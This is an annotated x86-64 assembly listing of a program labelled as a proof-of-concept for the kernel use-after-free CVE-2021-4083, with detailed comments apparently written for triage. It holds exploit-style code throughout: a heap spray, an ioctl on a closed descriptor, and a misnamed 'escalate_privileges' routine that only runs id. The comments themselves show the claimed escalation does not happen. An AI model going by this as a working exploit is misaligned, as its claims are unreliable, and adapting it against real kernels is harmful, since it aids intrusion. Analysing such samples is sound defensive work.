# ----------------------------------------------------------------------
# dot.s -- compiler output for dot.c (toolchain named in the .ident at
# the end of the file).  AT&T syntax, x86-64 System V ABI, position
# independent: every library call goes through the PLT and every data
# reference is RIP-relative.  The .rodata strings identify the program
# as a proof-of-concept for CVE-2021-4083.  Every function carries a
# stack-protector canary (loaded from %fs:40) and .cfi unwind
# directives; the canary and unwind sequences must stay exactly as
# emitted or unwinding/__stack_chk_fail behaviour changes.
# ----------------------------------------------------------------------
	.file	"dot.c"
	.text
	.globl	heap_spray
	.type	heap_spray, @function
#-----------------------------------------------------------------------
# void *heap_spray(void *arg)        -- used as a pthread start routine
# ABI:    SysV AMD64
# In:     rdi = arg (spilled to -56(%rbp) and never read again)
# Out:    rax = 0 (NULL)
# Stack:  push rbp, push rbx, sub 56  -> rsp is 16-aligned at each call
# Locals: -24(%rbp) canary, -32(%rbp) void **table, -36(%rbp) int i
# Does:   table = malloc(80000);          /* 10000 * sizeof(void *) */
#         for (i = 0; i <= 9999; i++) {
#             table[i] = malloc(256);
#             memset(table[i], 'A', 256); /* 65 == 'A' */
#         }
#         Nothing is freed: the table and the 10000 256-byte chunks stay
#         allocated for the life of the process.  No malloc return value
#         is checked, so a NULL from malloc would be dereferenced here.
# Clobb:  rax, rcx, rdx, rsi, rdi (plus whatever malloc/memset clobber);
#         rbx is callee-saved and is pushed/popped around its use.
#-----------------------------------------------------------------------
heap_spray:
.LFB6:
	.cfi_startproc
	pushq	%rbp
	.cfi_def_cfa_offset 16
	.cfi_offset 6, -16
	movq	%rsp, %rbp
	.cfi_def_cfa_register 6
	pushq	%rbx				# rbx keeps &table[i] live across malloc
	subq	$56, %rsp
	.cfi_offset 3, -24
	movq	%rdi, -56(%rbp)			# arg, unused
	movq	%fs:40, %rax			# stack-protector canary
	movq	%rax, -24(%rbp)
	xorl	%eax, %eax
	movl	$80000, %edi
	call	malloc@PLT			# table = malloc(80000)
	movq	%rax, -32(%rbp)
	movl	$0, -36(%rbp)			# i = 0
	jmp	.L2
.L3:
	movl	-36(%rbp), %eax
	cltq					# sign-extend i (int) to 64 bits
	leaq	0(,%rax,8), %rdx		# i * sizeof(void *)
	movq	-32(%rbp), %rax
	leaq	(%rdx,%rax), %rbx		# rbx = &table[i]
	movl	$256, %edi
	call	malloc@PLT
	movq	%rax, (%rbx)			# table[i] = malloc(256)
	movl	-36(%rbp), %eax
	cltq
	leaq	0(,%rax,8), %rdx
	movq	-32(%rbp), %rax
	addq	%rdx, %rax
	movq	(%rax), %rax			# rax = table[i] (reloaded from memory)
	movl	$256, %edx			# n = 256
	movl	$65, %esi			# c = 'A'
	movq	%rax, %rdi
	call	memset@PLT			# memset(table[i], 'A', 256)
	addl	$1, -36(%rbp)			# i++
.L2:
	cmpl	$9999, -36(%rbp)
	jle	.L3				# signed compare: loop while i <= 9999
	movl	$0, %eax			# return NULL
	movq	-24(%rbp), %rcx
	xorq	%fs:40, %rcx			# canary intact?
	je	.L5
	call	__stack_chk_fail@PLT		# does not return
.L5:
	addq	$56, %rsp
	popq	%rbx
	popq	%rbp
	.cfi_def_cfa 7, 8
	ret
	.cfi_endproc
.LFE6:
	.size	heap_spray, .-heap_spray
	.section	.rodata
.LC0:
	.string	"/dev/null"
.LC1:
	.string	"open"
	.text
	.globl	trigger_use_after_free
	.type	trigger_use_after_free, @function
#-----------------------------------------------------------------------
# void trigger_use_after_free(void)
# ABI:    SysV AMD64
# Stack:  push rbp, sub 32 -> rsp is 16-aligned at each call
# Locals: -8(%rbp) canary, -16(%rbp) pthread_t t, -20(%rbp) int fd
# Does:   fd = open("/dev/null", 0);          /* flags 0 == O_RDONLY */
#         if (fd < 0) { perror("open"); exit(1); }
#         pthread_create(&t, NULL, heap_spray, NULL);  /* result ignored */
#         usleep(500000);
#         close(fd);
#         ioctl(fd, 0, 0);      /* issued on the descriptor just closed */
#         The thread is never joined and no return value after open() is
#         checked.  On a kernel whose descriptor lookup is sound the
#         final ioctl simply fails with EBADF; the program prints no
#         diagnostic either way.  For triage, the distinctive sequence
#         is: open /dev/null, spawn a thread, sleep 0.5 s, close, then
#         ioctl on the closed fd.
#-----------------------------------------------------------------------
trigger_use_after_free:
.LFB7:
	.cfi_startproc
	pushq	%rbp
	.cfi_def_cfa_offset 16
	.cfi_offset 6, -16
	movq	%rsp, %rbp
	.cfi_def_cfa_register 6
	subq	$32, %rsp
	movq	%fs:40, %rax			# stack-protector canary
	movq	%rax, -8(%rbp)
	xorl	%eax, %eax
	movl	$0, %esi			# flags = 0 (O_RDONLY)
	leaq	.LC0(%rip), %rdi		# "/dev/null"
	movl	$0, %eax			# open is variadic: al = 0 vector args
	call	open@PLT
	movl	%eax, -20(%rbp)			# fd
	cmpl	$0, -20(%rbp)
	jns	.L7				# fd >= 0 -> continue
	leaq	.LC1(%rip), %rdi		# "open"
	call	perror@PLT
	movl	$1, %edi
	call	exit@PLT			# exit(1); does not return
.L7:
	leaq	-16(%rbp), %rax			# &t
	movl	$0, %ecx			# arg   = NULL
	leaq	heap_spray(%rip), %rdx		# start = heap_spray
	movl	$0, %esi			# attr  = NULL
	movq	%rax, %rdi
	call	pthread_create@PLT		# return value discarded
	movl	$500000, %edi
	call	usleep@PLT			# 500 ms
	movl	-20(%rbp), %eax
	movl	%eax, %edi
	call	close@PLT			# close(fd)
	movl	-20(%rbp), %eax			# same fd value, now closed
	movl	$0, %edx			# arg     = 0
	movl	$0, %esi			# request = 0
	movl	%eax, %edi
	movl	$0, %eax			# ioctl is variadic: al = 0 vector args
	call	ioctl@PLT			# result ignored
	nop					# -O0 artifact before the epilogue (presumably)
	movq	-8(%rbp), %rax
	xorq	%fs:40, %rax			# canary intact?
	je	.L8
	call	__stack_chk_fail@PLT		# does not return
.L8:
	leave
	.cfi_def_cfa 7, 8
	ret
	.cfi_endproc
.LFE7:
	.size	trigger_use_after_free, .-trigger_use_after_free
	.section	.rodata
.LC2:
	.string	"/usr/bin/id"			# body of .LC2, whose label precedes this line
	.text
	.globl	escalate_privileges
	.type	escalate_privileges, @function
#-----------------------------------------------------------------------
# void escalate_privileges(void)
# ABI:    SysV AMD64
# Stack:  push rbp, sub 16 -> rsp is 16-aligned at the call
# Locals: -8(%rbp) canary only
# Does:   system("/usr/bin/id");
#         Despite its name this function changes no credentials: it runs
#         id(1) through the shell, so the output reflects whatever
#         identity the process already has.  system()'s return value is
#         discarded.  The canary guards no local buffer; presumably the
#         hardened toolchain named in .ident enables the protector for
#         every function -- confirm against the build flags.
#-----------------------------------------------------------------------
escalate_privileges:
.LFB8:
	.cfi_startproc
	pushq	%rbp
	.cfi_def_cfa_offset 16
	.cfi_offset 6, -16
	movq	%rsp, %rbp
	.cfi_def_cfa_register 6
	subq	$16, %rsp
	movq	%fs:40, %rax			# stack-protector canary
	movq	%rax, -8(%rbp)
	xorl	%eax, %eax
	leaq	.LC2(%rip), %rdi		# "/usr/bin/id"
	call	system@PLT			# result ignored
	nop					# -O0 artifact before the epilogue (presumably)
	movq	-8(%rbp), %rax
	xorq	%fs:40, %rax			# canary intact?
	je	.L10
	call	__stack_chk_fail@PLT		# does not return
.L10:
	leave
	.cfi_def_cfa 7, 8
	ret
	.cfi_endproc
.LFE8:
	.size	escalate_privileges, .-escalate_privileges
	.section	.rodata
	.align 8
.LC3:
	.string	"[*] Triggering CVE-2021-4083 (use-after-free in fget)"
	.align 8
.LC4:
	.string	"[*] If the kernel did not crash, attempting privilege escalation"
	.text
	.globl	main
	.type	main, @function
#-----------------------------------------------------------------------
# int main(void)
# ABI:    SysV AMD64
# Stack:  push rbp, sub 16 -> rsp is 16-aligned at each call
# Locals: -8(%rbp) canary only
# Does:   printf(.LC3);
#         trigger_use_after_free();
#         printf(.LC4);
#         escalate_privileges();
#         return 0;
#         Both printf literals contain no conversion specifiers and no
#         trailing newline.  %eax is zeroed before each call: required
#         for the variadic printf (no vector-register args); before the
#         two local calls it suggests they were declared with empty
#         parentheses in dot.c -- unverified.  The thread started inside
#         trigger_use_after_free() is never joined, so heap_spray() may
#         still be running when main returns and the process exits.
#-----------------------------------------------------------------------
main:
.LFB9:
	.cfi_startproc
	pushq	%rbp
	.cfi_def_cfa_offset 16
	.cfi_offset 6, -16
	movq	%rsp, %rbp
	.cfi_def_cfa_register 6
	subq	$16, %rsp
	movq	%fs:40, %rax			# stack-protector canary
	movq	%rax, -8(%rbp)
	xorl	%eax, %eax
	leaq	.LC3(%rip), %rdi
	movl	$0, %eax			# printf is variadic: al = 0 vector args
	call	printf@PLT
	movl	$0, %eax
	call	trigger_use_after_free
	leaq	.LC4(%rip), %rdi
	movl	$0, %eax			# al = 0 for variadic printf
	call	printf@PLT
	movl	$0, %eax
	call	escalate_privileges
	movl	$0, %eax			# return 0
	movq	-8(%rbp), %rdx
	xorq	%fs:40, %rdx			# canary intact?
	je	.L13
	call	__stack_chk_fail@PLT		# does not return
.L13:
	leave
	.cfi_def_cfa 7, 8
	ret
	.cfi_endproc
.LFE9:
	.size	main, .-main
	.ident	"GCC: (Gentoo Hardened 7.3.0-r6 p1.8) 7.3.0"
	.section	.note.GNU-stack,"",@progbits	# empty flags: requests a non-executable stack